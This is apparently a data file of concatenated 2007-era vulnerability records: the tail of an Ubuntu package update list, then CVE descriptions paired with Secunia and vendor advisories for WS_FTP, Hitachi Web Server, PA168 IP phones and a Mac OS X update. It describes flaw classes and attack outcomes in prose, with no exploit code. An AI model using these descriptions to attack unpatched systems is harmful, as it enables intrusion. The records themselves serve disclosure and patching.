http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.1.10-1ubuntu2.3_powerpc.deb Size/MD5: 708456 fd230d35b21882e8f33a733571589eb3 http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.1.10-1ubuntu2.3_powerpc.udeb Size/MD5: 241444 985d65e2f522108b58cbb7101a1c4e93 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.1.10-1ubuntu2.3_powerpc.deb Size/MD5: 429892 e96a4115854d6b32907a3249bda2a0b4 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont-dev_1.0.0-0ubuntu3.3_powerpc.deb Size/MD5: 290970 714aaa371169f80396afd1d5d0bc082a http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1-dbg_1.0.0-0ubuntu3.3_powerpc.deb Size/MD5: 369962 cda66f3b003f5faeabe2225356ff414c http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1_1.0.0-0ubuntu3.3_powerpc.deb Size/MD5: 235378 3086125be0dd5bb2480f31d4a21b46c6 http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx-tools_1.0.2-0ubuntu10.6_powerpc.deb Size/MD5: 55158 3d6a6b1cf5be95e00a48e5523d641d29 http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx_1.0.2-0ubuntu10.6_powerpc.deb Size/MD5: 825340 a5329d0d2322ebb0c2d102a47635216f http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xnest_1.0.2-0ubuntu10.6_powerpc.deb Size/MD5: 1368184 0e1b6171168a996773c760b8b875648e http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-core_1.0.2-0ubuntu10.6_powerpc.deb Size/MD5: 4076112 3668d14302e64241292219b67e1f9659 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-dev_1.0.2-0ubuntu10.6_powerpc.deb Size/MD5: 294538 5ef1c38d239ef6e6ac65d852d96c1665 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xvfb_1.0.2-0ubuntu10.6_powerpc.deb Size/MD5: 1506656 fc1885b7b5f482fe734f5d081b072b51 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.1.10-1ubuntu2.3_sparc.deb Size/MD5: 120076 f0524701f9defa5d49f80b333dba9161 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.1.10-1ubuntu2.3_sparc.deb Size/MD5: 683560 22024047655d0a6e26c484d1d231be3c http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.1.10-1ubuntu2.3_sparc.udeb Size/MD5: 222408 4a26ce30531b338bc5ce9e16bfcda691 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.1.10-1ubuntu2.3_sparc.deb Size/MD5: 410888 897071c782c16c0e3000a9c4586e184f http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont-dev_1.0.0-0ubuntu3.3_sparc.deb Size/MD5: 297866 0775567bab801a064f92e79c0939886c http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1-dbg_1.0.0-0ubuntu3.3_sparc.deb Size/MD5: 321246 8e57f2843bf6cb39a8cbde389c740872 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1_1.0.0-0ubuntu3.3_sparc.deb Size/MD5: 229820 c0e50a0ea242052b971dbd43f4144d6f http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx-tools_1.0.2-0ubuntu10.6_sparc.deb Size/MD5: 43880 705741e8b4a3cd9b591da2a1b85db401 http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx_1.0.2-0ubuntu10.6_sparc.deb Size/MD5: 758608 92ca7b1ee8f4509a4222c1dae58cb288 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xnest_1.0.2-0ubuntu10.6_sparc.deb Size/MD5: 1313218 208167a5f9f5d074bf1f162da5377664 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-core_1.0.2-0ubuntu10.6_sparc.deb Size/MD5: 3789064 d7127a902bc8951e03e70baece970b34 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-dev_1.0.2-0ubuntu10.6_sparc.deb Size/MD5: 294998 c2d3c3b6673c8c8f70d23db3712c134b http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xvfb_1.0.2-0ubuntu10.6_sparc.deb Size/MD5: 1445764 a1efd9aa2fa04d62f69771887a5d557f Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.2.1-5ubuntu0.1.diff.gz Size/MD5: 32265 c95bae22cdf8aff7dd045ffd19b84acb http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.2.1-5ubuntu0.1.dsc Size/MD5: 804 3c64a49cc8029e44361ec5b5dbac0a96 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.2.1.orig.tar.gz Size/MD5: 1451392 a584e84d617c6e7919b4aef9b5106cf4 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont_1.2.0-0ubuntu3.1.diff.gz Size/MD5: 21080 14f360ae2e6a5c3a535ba34244f513c9 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont_1.2.0-0ubuntu3.1.dsc Size/MD5: 923 df21beb2608cc68aa140d315041d9795 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont_1.2.0.orig.tar.gz Size/MD5: 827186 b4cb7808df5804efeb457043fed13782 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xorg-server_1.1.1-0ubuntu12.2.diff.gz Size/MD5: 92001 cbe621e817e97c8a67ee7465bf3fa266 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xorg-server_1.1.1-0ubuntu12.2.dsc Size/MD5: 2020 e4b095a246fd0a52f314ce371b3e0cb6 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xorg-server_1.1.1.orig.tar.gz Size/MD5: 8388609 15852049050e49f380f953d8715500b9 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.2.1-5ubuntu0.1_amd64.deb Size/MD5: 150940 92d6b1c0aa652e6e8f013ae4048f4062 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.2.1-5ubuntu0.1_amd64.deb Size/MD5: 668960 0e5ff244ad6488cd3eb801b3768b7eda http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.2.1-5ubuntu0.1_amd64.udeb Size/MD5: 248264 4328e1df8f13a92086bc6dc0c43add50 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.2.1-5ubuntu0.1_amd64.deb Size/MD5: 353738 c41d6ae077ca5f31a25cc0f58cbd93c9 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont-dev_1.2.0-0ubuntu3.1_amd64.deb Size/MD5: 305140 eaa2799e4a889de2924c16629750c749 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1-dbg_1.2.0-0ubuntu3.1_amd64.deb Size/MD5: 354690 d06520d61f32e74f26764e6dbc1c14c4 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1_1.2.0-0ubuntu3.1_amd64.deb Size/MD5: 242998 5e24330de281bfc1bd33341abb57d967 http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx-tools_1.1.1-0ubuntu12.2_amd64.deb Size/MD5: 57434 5edf610ecbdd99e59f118959ca0eb414 http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx_1.1.1-0ubuntu12.2_amd64.deb Size/MD5: 813654 4da55af97b7c83f85c557df79f66c0c2 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xnest_1.1.1-0ubuntu12.2_amd64.deb Size/MD5: 1427180 efafeb1045b436463419496481cfdc78 http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xserver-xephyr_1.1.1-0ubuntu12.2_amd64.deb Size/MD5: 1608506 39e8887d0c3b1d4b4059a990ccacc07b http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-core_1.1.1-0ubuntu12.2_amd64.deb Size/MD5: 3917424 d69cc89a0777f800d5e74e3a8041fd93 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-dev_1.1.1-0ubuntu12.2_amd64.deb Size/MD5: 297442 b41410b7b585f2960827f912241891bc http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xvfb_1.1.1-0ubuntu12.2_amd64.deb Size/MD5: 1579394 facb0f2f9c2722e4d07af7dea9f838e5 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.2.1-5ubuntu0.1_i386.deb Size/MD5: 134026 6a3c9319eba74a20e6f5c0e3457a2e97 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.2.1-5ubuntu0.1_i386.deb Size/MD5: 640492 bb5ed3196a9e9fb626c17d96f40b3b2e http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.2.1-5ubuntu0.1_i386.udeb Size/MD5: 235400 cde67a8b74de363b4d3e1abe0f41e781 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.2.1-5ubuntu0.1_i386.deb Size/MD5: 341274 5aee6b86c26c312e17acf68808b737cc http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont-dev_1.2.0-0ubuntu3.1_i386.deb Size/MD5: 291958 2344c15719ade83c6e125e29e4b86c23 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1-dbg_1.2.0-0ubuntu3.1_i386.deb Size/MD5: 336952 fe81984c7c8cf4a8ca6a0f44998bc0eb http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1_1.2.0-0ubuntu3.1_i386.deb Size/MD5: 226028 5456ac2131d824a096d1e979cecfcea4 http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx-tools_1.1.1-0ubuntu12.2_i386.deb Size/MD5: 50646 23cd4f9ca5689117c09c43ebdcfea49e http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx_1.1.1-0ubuntu12.2_i386.deb Size/MD5: 751476 f3769d8fb8508eca644db0c8d9530a08 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xnest_1.1.1-0ubuntu12.2_i386.deb Size/MD5: 1327210 73b1fa3c9d0e365f029962cb4e920b8e http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xserver-xephyr_1.1.1-0ubuntu12.2_i386.deb Size/MD5: 1498720 e7e629d60198742c9040687d9c02d108 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-core_1.1.1-0ubuntu12.2_i386.deb Size/MD5: 3563454 7f18073d92ab9a8a5fbb096b483598b5 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-dev_1.1.1-0ubuntu12.2_i386.deb Size/MD5: 297484 7d506b6a3fee567e20a2a5e7aa6c2bc7 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xvfb_1.1.1-0ubuntu12.2_i386.deb Size/MD5: 1475138 fffb6ddb7a71160b492de7c8987cfc9b powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.2.1-5ubuntu0.1_powerpc.deb Size/MD5: 148582 24a4dc3fcd4e9ed1cc439178926016b4 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.2.1-5ubuntu0.1_powerpc.deb Size/MD5: 663380 d84c7eab9c0a1678485b5c10c99e227d http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.2.1-5ubuntu0.1_powerpc.udeb Size/MD5: 241628 bff6e436dc7884091e9a159425fb3345 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.2.1-5ubuntu0.1_powerpc.deb Size/MD5: 346870 8da887f46827f7a148b9d5573d6cb526 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont-dev_1.2.0-0ubuntu3.1_powerpc.deb Size/MD5: 295948 e373a2fb962bbd917ed1475707925379 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1-dbg_1.2.0-0ubuntu3.1_powerpc.deb Size/MD5: 353796 9ad2219e7d15c1e5267c922f5d518954 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1_1.2.0-0ubuntu3.1_powerpc.deb Size/MD5: 237280 a187dc106461ded50a6cafe3b7e5442d http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx-tools_1.1.1-0ubuntu12.2_powerpc.deb Size/MD5: 63432 d611ac901c34e99a1cfc77956c6f42c4 http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx_1.1.1-0ubuntu12.2_powerpc.deb Size/MD5: 797454 d0208072254a9e1e6041b12f660a7cf0 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xnest_1.1.1-0ubuntu12.2_powerpc.deb Size/MD5: 1401888 9af060d4e15bcbc8bd55ec3b77f8f733 http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xserver-xephyr_1.1.1-0ubuntu12.2_powerpc.deb Size/MD5: 1565976 22e88a95a1d3dc23299f782df124578e http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-core_1.1.1-0ubuntu12.2_powerpc.deb Size/MD5: 3983002 3345dba424bb25e0862b66acda8747d8 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-dev_1.1.1-0ubuntu12.2_powerpc.deb Size/MD5: 297498 55dd5abe4abf1c7ef441c85dc070e68a http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xvfb_1.1.1-0ubuntu12.2_powerpc.deb Size/MD5: 1541334 474f69d831b778c5825ae02d340556e2 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.2.1-5ubuntu0.1_sparc.deb Size/MD5: 131806 c3d342df6c666a6ff77ad70c7c729297 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.2.1-5ubuntu0.1_sparc.deb Size/MD5: 635934 2ba5cf3a10353ed63a2b08a5ebd038ff http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.2.1-5ubuntu0.1_sparc.udeb Size/MD5: 220156 4f9315e0d159b61aed69ae09c8282b82 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.2.1-5ubuntu0.1_sparc.deb Size/MD5: 325494 95813d719f39a3b86f6b44cda4519a83 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont-dev_1.2.0-0ubuntu3.1_sparc.deb Size/MD5: 304582 8bca3c95b9e5f10d08357fb32ffa690c http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1-dbg_1.2.0-0ubuntu3.1_sparc.deb Size/MD5: 321526 1765ba83a127b01ed81632785688a0b0 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1_1.2.0-0ubuntu3.1_sparc.deb Size/MD5: 234114 fd5c8e1b70051aeae6d189037043c23e http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx-tools_1.1.1-0ubuntu12.2_sparc.deb Size/MD5: 50314 9fdc77ad9a5448d3b92c3b05fcfc4ac1 http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx_1.1.1-0ubuntu12.2_sparc.deb Size/MD5: 733754 8d5052a6cb973b478b57efcf9535020b http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xnest_1.1.1-0ubuntu12.2_sparc.deb Size/MD5: 1344340 10ad7e4b138b14102ab3a396fa31255f http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xserver-xephyr_1.1.1-0ubuntu12.2_sparc.deb Size/MD5: 1500142 801229631c468c808bc3570a02f36436 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-core_1.1.1-0ubuntu12.2_sparc.deb Size/MD5: 3695516 c037048a7c2971f1c064e1644083a738 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-dev_1.1.1-0ubuntu12.2_sparc.deb Size/MD5: 297856 45e8359cdae581b6ab4d5ad683a4ba89 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xvfb_1.1.1-0ubuntu12.2_sparc.deb Size/MD5: 1477724 8d6c6d871e63e6009ab6f9be3b10300f

Format string vulnerability in the SCP module in Ipswitch WS_FTP 2007 Professional might allow remote attackers to execute arbitrary commands via format string specifiers in the filename, related to the SHELL WS_FTP script command. WS_FTP is prone to a format-string vulnerability because the application fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. A successful attack may allow the attacker to crash the application or possibly to execute arbitrary code. This may facilitate unauthorized access or privilege escalation in the context of the user running the application. WS_FTP is a standard FTP client tool under the Winsock protocol. A remote attacker may exploit this vulnerability to control the user's machine by tricking the user into opening a malicious file

Multiple cross-site scripting (XSS) vulnerabilities in multiple Hitachi Web Server, uCosminexus, and Cosminexus products before 20070124 allow remote attackers to inject arbitrary web script or HTML via (1) HTTP Expect headers or (2) image maps. Hitachi Web Server has vulnerabilities listed below: 1. A vulnerability that allows to roll back the Open SSL version when using the SSL. 2. 3. Cross-site scripting vulnerability due to inadequate processing of the Expect header.1. When using the SSL, there is the possibility an attacker could deceptively alter the protocol, forcing the use of SSL version 2. 2. and 3. An attacker could insert malicious script. ** Delete ** This case CVE-2005-2969 , CVE-2005-3352 , CVE-2006-3918 Contents of ( Both are Hitachi vendor information HS06-022) And was removed because it was found to be a duplicate. CVE-2005-2969 , CVE-2005-3352 , CVE-2006-3918 Please refer to. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user or to bypass certain security restrictions. This may help the attacker steal cookie-based authentication credentials and launch other attacks. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. 1) Input passed to certain parameters in various files in Hitachi Web Server is not properly sanitised before being returned to the user. 2) Input passed via the "Expect" header in Hitachi Web Server is not properly sanitised before being returned to the user. 3) An error in the way Hitachi Web Server handles SSL 3.0 or TLS 1.0 protocols can be exploited by attackers to replace the connection with a connection using SSL 2.0 protocol. See the vendor advisory for a matrix of affected versions. SOLUTION: Updates are available for some versions (please see vendor's advisory for details). PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.hitachi-support.com/security_e/vuls_e/HS06-022_e/01-e.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The admin web console implemented by the Centrality Communications (aka Aredfox) PA168 chipset and firmware 1.54 and earlier, as provided by various IP phones, does not require passwords or authentication tokens when using HTTP, which allows remote attackers to connect to existing superuser sessions and obtain sensitive information (passwords and configuration data). Pa168 Chipset is prone to a information disclosure vulnerability. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. Try it out online: http://secunia.com/software_inspector/ ---------------------------------------------------------------------- TITLE: SOYO G668 Ethernet IP Phone Session Management Vulnerability SECUNIA ADVISORY ID: SA23936 VERIFY ADVISORY: http://secunia.com/advisories/23936/ CRITICAL: Less critical IMPACT: Security Bypass WHERE: >From remote OPERATING SYSTEM: SOYO G668 IP Phone 1.x http://secunia.com/product/13354/ DESCRIPTION: Adrian Pastor has reported a vulnerability in SOYO G668 Ethernet IP Phone, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is caused due to an error within the session management. If a superuser logs into the web management console, the web service accepts any request as long as the superuser's session is valid. This can be exploited to bypass the authentication process and e.g. allows the modification of certain settings. The vulnerability is reported in firmware version 1.42. Other versions may also be affected. SOLUTION: Only log into the web management console from trusted network environments. Use a firewall to restrict access to the phone. PROVIDED AND/OR DISCOVERED BY: Adrian Pastor ORIGINAL ADVISORY: http://milw0rm.com/exploits/3189 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The _CFNetConnectionWillEnqueueRequests function in CFNetwork 129.19 on Apple Mac OS X 10.4 through 10.4.10 allows remote attackers to cause a denial of service (application crash) via a crafted HTTP 301 response, which results in a NULL pointer dereference. Apple CFNetwork Framework is prone to a denial-of-service vulnerability. Attackers may exploit this issue by issuing a maliciously designed HTTP response to a client application that uses the vulnerable CFNetwork API. Successful exploits will result in denial-of-service conditions within client applications. CFNetwork 129.19 on Mac OS X 10.4.8 is vulnerable to this issue. Remote attackers may use this vulnerability to cause the client to crash. CFNetwork is a Core Services framework that provides the function libraries needed to decompress network protocols. This vulnerability can be triggered if the server sends a specially crafted response to a client using this API, resulting in a denial of service condition. ---------------------------------------------------------------------- 2003: 2,700 advisories published 2004: 3,100 advisories published 2005: 4,600 advisories published 2006: 5,300 advisories published How do you know which Secunia advisories are important to you? The Secunia Vulnerability Intelligence Solutions allows you to filter and structure all the information you need, so you can address issues effectively. Get a free trial of the Secunia Vulnerability Intelligence Solutions: http://corporate.secunia.com/how_to_buy/38/vi/?ref=secadv ---------------------------------------------------------------------- TITLE: Apple Mac OS X Security Update Fixes Multiple Vulnerabilities SECUNIA ADVISORY ID: SA27643 VERIFY ADVISORY: http://secunia.com/advisories/27643/ CRITICAL: Highly critical IMPACT: Security Bypass, Cross Site Scripting, Spoofing, Exposure of sensitive information, Privilege escalation, DoS, System access WHERE: >From remote OPERATING SYSTEM: Apple Macintosh OS X http://secunia.com/product/96/ DESCRIPTION: Apple has issued a security update for Mac OS X, which fixes multiple vulnerabilities. 1) Multiple errors within the Adobe Flash Player plug-in can be exploited by malicious people to gain knowledge of sensitive information or compromise a user's system. For more information: SA26027 2) A null-pointer dereference error exists within AppleRAID when handling disk images. This can be exploited to cause a system shutdown when a specially crafted disk image is mounted e.g. automatically via Safari if the option "Open 'safe' files after downloading" is enabled. 3) An error in BIND can be exploited by malicious people to poison the DNS cache. For more information: SA26152 4) An error in bzip2 can be exploited to cause a DoS (Denial of Service). For more information: SA15447 This also fixes a race condition when setting file permissions. 5) An unspecified error in the implementation of FTP of CFNetwork can be exploited by a malicious FTP server to cause the client to connect to other hosts by sending specially crafted replies to FTP PASV (passive) commands. 6) An unspecified error exists in the validation of certificates within CFNetwork. This can be exploited via a Man-in-the-Middle (MitM) attack to spoof a web site with a trusted certificate. 7) A null pointer dereference error in the CFNetwork framework can lead to an unexpected application termination when a vulnerable application connects to a malicious server. 8) A boundary error in CoreFoundation can be exploited to cause a one-byte buffer overflow when a user is enticed to read a specially crafted directory hierarchy. Successful exploitation allows execution of arbitrary code. 9) An error exists in CoreText due to the use of an uninitialised pointer and can be exploited to execute arbitrary code when a user is tricked into reading a specially crafted text. 10) Some vulnerabilities in Kerberos can be exploited by malicious users and malicious people to compromise a vulnerable system. For more information: SA26676 11) An error in the handling of the current Mach thread port or thread exception port in the Kernel can be exploited by a malicious, local user to execute arbitrary code with root privileges. Successful exploitation requires permission to execute a setuid binary. 12) An unspecified error in the Kernel can be exploited to bypass the chroot mechanism by changing the working directory using a relative path. 13) An integer overflow error in the "i386_set_ldt" system call can be exploited by malicious, local users to execute arbitrary code with escalated privileges. 14) An error exists in the handling of standard file descriptors while executing setuid and setgid programs. This can be exploited by malicious, local users to gain system privileges by executing setuid programs with the standard file descriptors in an unexpected state. 15) An integer overflow exists in the Kernel when handling ioctl requests. This can be exploited to execute arbitrary code with system privileges by sending a specially crafted ioctl request. 16) The default configuration of tftpd allows clients to access any path on the system. 17) An error in the Node Information Query mechanism may allow a remote user to query for all addresses of a host, including link-local addresses. 18) An integer overflow exists in the handling of ASP messages with AppleTalk. This can be exploited by malicious, local users to cause a heap-based buffer overflow and to execute arbitrary code with system privileges by sending a maliciously crafted ASP message on an AppleTalk socket. 19) A double-free error in the handling of certain IPV6 packets can potentially be exploited to execute arbitrary code with system privileges. 20) A boundary error exists when adding a new AppleTalk zone. This can be exploited to cause a stack-based buffer overflow by sending a maliciously crafted ioctl request to an AppleTalk socket and allows execution of arbitrary code with system privileges. 21) An arithmetic error exists in AppleTalk when handling memory allocations. This can be exploited by malicious, local users to cause a heap-based buffer overflow and execute arbitrary code with system privileges by sending a maliciously crafted AppleTalk message. 22) A double free error in NFS exists when processing an AUTH_UNIX RPC call. This can be exploited by malicious people to execute arbitrary code by sending a maliciously crafted AUTH_UNIX RPC call via TCP or UDP. 23) An unspecified case-sensitivity error exists in NSURL when determining if a URL references the local file system. 24) A format string error in Safari can be exploited by malicious people to execute arbitrary code when a user is tricked into opening a .download file with a specially crafted name. 25) An implementation error exists in the tabbed browsing feature of Safari. If HTTP authentication is used by a site being loaded in a tab other than the active tab, an authentication sheet may be displayed although the tab and its corresponding page are not visible. 26) A person with physical access to a system may be able to bypass the screen saver authentication dialog by sending keystrokes to a process running behind the screen saver authentication dialog. 27) Safari does not block "file://" URLs when loading resources. This can be exploited to view the content of local files by enticing a user to visit a specially crafted web page. 28) An input validation error exists in WebCore when handling HTML forms. This can be exploited to alter the values of form fields by enticing a user to upload a specially crafted file. 29) A race condition error exists in Safari when handling page transitions. This can be exploited to obtain information entered in forms on other web sites by enticing a user to visit a malicious web page. 30) An unspecified error exists in the handling of the browser's history. This can be exploited to execute arbitrary code by enticing a user to visit a specially crafted web page. 31) An error in Safari allows malicious websites to set Javascript window properties of websites served from a different domain. This can be exploited to get or set the window status and location of pages served from other websites by enticing a user to visit a specially crafted web page. 32) An error in Safari allows a malicious website to bypass the same origin policy by hosting embedded objects with javascript URLs. This can be exploited to execute arbitrary HTML and script code in context of another site by enticing a user to visit a specially crafted web page. 33) An error in Safari allows content served over HTTP to alter or access content served over HTTPS in the same domain. This can be exploited to execute Javascript code in context of HTTPS web pages in that domain when a user visits a malicious web page. 34) An error in Safari in the handling of new browser windows can be exploited to disclose the URL of an unrelated page. For more information see vulnerability #2 in: SA23893 35) An error in WebKit may allow unauthorised applications to access private keys added to the keychain by Safari. 36) An unspecified error in Safari may allow a malicious website to send remotely specified data to arbitrary TCP ports. 37) WebKit/Safari creates temporary files insecurely when previewing a PDF file, which may allow a local user to access the file's content. 5) The vendor credits Dr Bob Lopez PhD. 6) The vendor credits Marko Karppinen, Petteri Kamppuri, and Nikita Zhuk of MK&C. 9) Will Dormann, CERT/CC 11) An anonymous person, reported via iDefense Labs. 12) The vendor credits Johan Henselmans and Jesper Skov. 13) The vendor credits RISE Security. 14) The vendor credits Ilja van Sprundel. 15) The vendor credits Tobias Klein, www.trapkit.de 16) The vendor credits James P. Javery, Stratus Data Systems 17) The vendor credits Arnaud Ebalard, EADS Innovation Works. 18, 21) Sean Larsson, iDefense Labs 19) The vendor credits Bhavesh Davda of VMware and Brian "chort" Keefer of Tumbleweed Communications. 20) An anonymous person, reported via iDefense Labs. 22) The vendor credits Alan Newson of NGSSoftware, and Renaud Deraison of Tenable Network Security, Inc. 25) The vendor credits Michael Roitzsch, Technical University Dresden. 26) The vendor credits Faisal N. Jawdat 27) The vendor credits lixlpixel. 28) The vendor credits Bodo Ruskamp, Itchigo Communications GmbH. 29) The vendor credits Ryan Grisso, NetSuite. 30) The vendor credits David Bloom. 31, 32) The vendor credits Michal Zalewski, Google Inc. 33) The vendor credits Keigo Yamazaki of LAC Co. 36) The vendor credits Kostas G. Anagnostakis, Institute for Infocomm Research and Spiros Antonatos, FORTH-ICS 37) The vendor credits Jean-Luc Giraud, and Moritz Borgmann of ETH Zurich. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=307041 US-CERT VU#498105: http://www.kb.cert.org/vuls/id/498105 iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=630 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=629 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=627 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=628 OTHER REFERENCES: SA15447: http://secunia.com/advisories/15447/ SA23893: http://secunia.com/advisories/23893/ SA26027: http://secunia.com/advisories/26027/ SA26152: http://secunia.com/advisories/26152/ SA26676: http://secunia.com/advisories/26676/ ---------------------------------------------------------------------- About: This 